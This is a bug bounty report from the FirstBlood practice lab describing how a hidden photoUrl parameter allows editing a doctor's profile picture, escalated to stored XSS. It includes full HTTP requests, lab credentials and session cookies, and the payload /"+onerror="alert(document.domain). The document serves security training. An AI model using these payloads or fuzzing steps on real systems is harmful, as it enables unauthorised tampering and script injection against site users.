FirstBlood-#1446[COLLAB] Able to update profile picture of doctor
This issue was discovered on FirstBlood v3



On 2022-12-10, ar6aaz Level 3 reported:

COLLAB: Mr_Xhunt

Hello FirstBlood Team,

I have come across a vulnerability on FirstBloodv3 where I am able to update a doctor's profile picture.

Currently, updating profile picture is not allowed. But we can update it using the following steps.

Steps to Reproduce:

  1. Login to Firstbloodv3 using credentials admin/admin
  2. Edit a doctor and send that request in Burp to Repeater.
  3. In Repeater tab, change request method from POST to GET and fuzz for parameters using Param Miner.
  4. It will catch a parameter photo.
  5. Add "photo" parameter to the request and check response, it will ask you to use "photoUrl" parameter instead
  6. Change to "photoUrl" parameter and add a Burp Collaborator/InteractSH URL. It will ask you to enter a relative URL instead.
  7. Enter a relative URL image of another doctor. Example: If you are editing doctor3, the edit request should have relative URL of another doctor- photoUrl=/images/doctor_2.png
  8. Visit https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com/doctors.php

You will see that you are able to edit profile image of another doctor as well, which is not ideally allowed.

Sample request should like this:

GET /drpanel/drapi/edit-dr.php?drid=2&name=Shanice&bio=A+board-certified+pediatrician+with+over+8+years+of+experience.+She+received+her+medical+degree+from+the+University+of+Michigan+and+completed+her+residency+at+Children's+Hospital+of+Los+Angeles.+In+her+practice,+she++focuses+on+providing+preventive+care+and+promoting+healthy+habits+in+children+and+teenagers.+She+is+dedicated+to+making+her+patients+feel+comfortable+and+providing+them+with+the+highest+quality+care.&bookable=0&photoUrl=/images/doctor_2.png HTTP/1.1
Host: 9f3475d490f7-ar6aaz.a.firstbloodhackers.com
Cookie: drps=183afa7fd7316bd35b9399184
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Updated Images:

This can further be escalated to Stored XSS on the endpoint /meet_drs.php If we enter the payload /"+onerror="alert(document.domain) in photoUrl, it triggers the XSS on /meet_drs.php.

GET request:

GET /drpanel/drapi/edit-dr.php?drid=1&name=Julie&bio=xssA+board-certified+family+medicine+physician+with+over+10+years+of+experience.+She+received+her+medical+degree+from+the+University+of+California,+San+Francisco+and+completed+her+residency+at+Santa+Clara+Valley+Medical+Center.+In+her+practice,+Dr.+Thompson+focuses+on+preventative+care+and+helping+patients+manage+chronic+conditions.+She+is+passionate+about+providing+personalized,+high-quality+care+to+her+patients.&photoUrl=/"+onerror="alert(document.domain)&bookable=0&csrf=_sKf7avp5rxq8Ac2KaW1E HTTP/1.1
Host: 387755f6d078-ar6aaz.a.firstbloodhackers.com
Cookie: drps=7abf2ac65c6ed0113cd39487c
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://387755f6d078-ar6aaz.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://387755f6d078-ar6aaz.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Stored XSS executing:

P2 High

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: /images/doctor_2.png


FirstBlood ID: 64
Vulnerability Type: Stored XSS

There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the third to discover XSS via the photo parameter on meet_drs.php! As this is a collaboration report, the bounty has been split evenly.